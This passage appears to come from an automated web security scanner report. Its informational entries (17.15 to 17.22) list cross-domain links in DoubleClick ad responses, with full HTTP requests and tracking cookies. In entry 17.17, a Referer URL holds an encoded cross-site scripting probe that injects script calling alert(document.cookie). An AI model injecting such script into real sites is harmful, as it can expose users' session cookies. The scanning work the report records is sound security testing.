Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9519

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F&redirectURL=http%3a%2f%2fgps.turbotax.com/ty10/bn/frmnf%3Fcid%3Dbn_im_nf_anb_op_Gfrm_pk_300x250%26priorityCode%3D4654900000"><img src="http://s0.2mdn.net/1986897/TT_GPS_Frame_NA_N_300x250.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a></noscript>
<script src="http://b.scorecardresearch.com/beacon.js?c1=3&c2=6035338&c3=5070033&c4=40150110&c5=57234521&c6=&"></script>
...[SNIP]...

17.15. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The page was loaded from a URL containing a query string:

http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838?

The response contains the following links to other domains:

http://b.scorecardresearch.com/beacon.js?c1=3&c2=6035338&c3=5070033&c4=39601731&c5=57234521&c6=&
http://pixel.quantserve.com/pixel/p-78V15bIOxaPIs.gif?media=ad&labels=_imp.adserver.doubleclick,_imp.publisher.57234521,_imp.placement.233316945,_imp.creative.39601731
http://s0.2mdn.net/1986897/TT_GPSCORE_Scroll_FREE_N_300x250.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:17:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9015

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/scroll_f%3Fcid%3Dbn_im_f_anb_op_ScrFr_pk_300x250%26priorityCode%3D4654900000"><img src="http://s0.2mdn.net/1986897/TT_GPSCORE_Scroll_FREE_N_300x250.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a></noscript>
<script src="http://b.scorecardresearch.com/beacon.js?c1=3&c2=6035338&c3=5070033&c4=39601731&c5=57234521&c6=&"></script>

<img src="http://pixel.quantserve.com/pixel/p-78V15bIOxaPIs.gif?media=ad&labels=_imp.adserver.doubleclick,_imp.publisher.57234521,_imp.placement.233316945,_imp.creative.39601731" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</body>
...[SNIP]...

17.16. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The page was loaded from a URL containing a query string:

http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?

The response contains the following links to other domains:

http://b.scorecardresearch.com/beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113&c5=59067898&c6=&
http://s0.2mdn.net/1986897/TT_GPSSegments_Seg4GPS_TX_N_300x250.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:13:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9611

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
vl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=http%3a%2f%2flp2.turbotax.com/ty10/bn/geo_tx%3Fcid%3Dbn_im_nf_anb_opgeotxT_txG_pk_300x250%26priorityCode%3D4654800000"><img src="http://s0.2mdn.net/1986897/TT_GPSSegments_Seg4GPS_TX_N_300x250.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a></noscript>
<script src="http://b.scorecardresearch.com/beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113&c5=59067898&c6=&"></script>
...[SNIP]...

17.17. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.google/B2343920.91

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599?

The response contains the following links to other domains:

http://s0.2mdn.net/1420759/cls_edu_PassAgeBlueCardFixSDN15s40k_MomsGrants_Qual_DynFA_1210_300x250.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:08:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4925

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
rprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819"><img src="http://s0.2mdn.net/1420759/cls_edu_PassAgeBlueCardFixSDN15s40k_MomsGrants_Qual_DynFA_1210_300x250.gif" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.18. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.msn-dm/B2343920.67

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67;sz=300x250;ord=111281286?click=http://clk.redcated/goiframe/142215812.69688405/197075234/direct/01%3fhref=

The response contains the following links to other domains:

http://s0.2mdn.net/1420759/lmb_iau_MSN_PassAgeBtnBusyParkingLotCNP15s40k_RippedOffProb_0111_300x250.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N3285.msn-dm/B2343920.67;sz=300x250;ord=111281286?click=http://clk.redcated/goiframe/142215812.69688405/197075234/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/197075234/direct;;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 21:46:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4101

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
0/250%3B40152815/40170602/1%3B%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/142215812.69688405/197075234/direct/01%3fhref=https://insurance.lowermybills.com/auto/?sourceid=25708763-222980277-40170602"><img src="http://s0.2mdn.net/1420759/lmb_iau_MSN_PassAgeBtnBusyParkingLotCNP15s40k_RippedOffProb_0111_300x250.gif" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.19. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.msn-dm/B2343920.67

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67;sz=300x250;ord=145358386?click=http://clk.redcated/goiframe/142215812.69688405/197075234/direct/01%3fhref=

The response contains the following links to other domains:

http://s0.2mdn.net/1420759/lmb_iau_MSN_PassAgeBtnBusyBoatDockCNP15s40k_RippedOffProb_0111_300x250.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N3285.msn-dm/B2343920.67;sz=300x250;ord=145358386?click=http://clk.redcated/goiframe/142215812.69688405/197075234/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/197075234/direct;;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 21:48:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4095

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
0/250%3B40317649/40335436/1%3B%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/142215812.69688405/197075234/direct/01%3fhref=https://insurance.lowermybills.com/auto/?sourceid=25708763-222980277-40335436"><img src="http://s0.2mdn.net/1420759/lmb_iau_MSN_PassAgeBtnBusyBoatDockCNP15s40k_RippedOffProb_0111_300x250.gif" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.20. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.msn-dm/B2343920.67

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67;sz=300x250;ord=104579515?click=http://clk.redcated/goiframe/142215812.69688405/197075234/direct/01%3fhref=

The response contains the following links to other domains:

http://s0.2mdn.net/1420759/lmb_iau_MSN_PassAgeInsuranceCardCNP40k_LawBreak_TP_1210_300x250.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N3285.msn-dm/B2343920.67;sz=300x250;ord=104579515?click=http://clk.redcated/goiframe/142215812.69688405/197075234/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/197075234/direct;;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4074
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 02 Feb 2011 21:51:52 GMT
Expires: Wed, 02 Feb 2011 21:51:52 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
0/250%3B39772061/39789848/1%3B%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/142215812.69688405/197075234/direct/01%3fhref=https://insurance.lowermybills.com/auto/?sourceid=25708763-222980277-39789848"><img src="http://s0.2mdn.net/1420759/lmb_iau_MSN_PassAgeInsuranceCardCNP40k_LawBreak_TP_1210_300x250.gif" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.21. http://ad.doubleclick.net/adi/N3466.8451.ORBITZLLC/B4967866.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3466.8451.ORBITZLLC/B4967866.3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3466.8451.ORBITZLLC/B4967866.3;sz=300x250;ord=[timestamp]?

The response contains the following links to other domains:

http://s1.2mdn.net/2507092/Orbitz_300x250_BU.gif
http://s1.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 01 Feb 2011 15:27:05 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: id=22be9a760c01001c||t=1296574025|et=730|cs=qidqaf6e; expires=Thu, 31-Jan-2013 15:27:05 GMT; path=/; domain=.doubleclick.net
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 6668

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;">

<script src="http://s1.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
AqgDAdgEgK3iBOAEApoFGAi8zz4Q4qnOGhj_n-1uIM3J6RIo1IKZAdoFAggA&num=0&sig=AGiWqtzDlNqDCNH99WIY_l5A_1FJMV6YmQ&client=&adurl=http://www.orbitz.com/App/PerformMDLPDealsContent%3Fdeal_id%3DBCski%26cnt%3DOVI"><img src="http://s1.2mdn.net/2507092/Orbitz_300x250_BU.gif" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.22. http://ad.doubleclick.net/adi/N3466.8451.ORBITZLLC/B4967866.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3466.8451.ORBITZLLC/B4967866.3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3466.8451.ORBITZLLC/B4967866.3;sz=300x250;ord=[timestamp]?

The response contains the following links to other domains:

http://s0.2mdn.net/2507092/Orbitz_300x250_BU.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 01 Feb 2011 15:23:12 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: id=2244e57c0c01002a||t=1296573792|et=730|cs=pkhwecaq; expires=Thu, 31-Jan-2013 15:23:12 GMT; path=/; domain=.doubleclick.net
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 6715

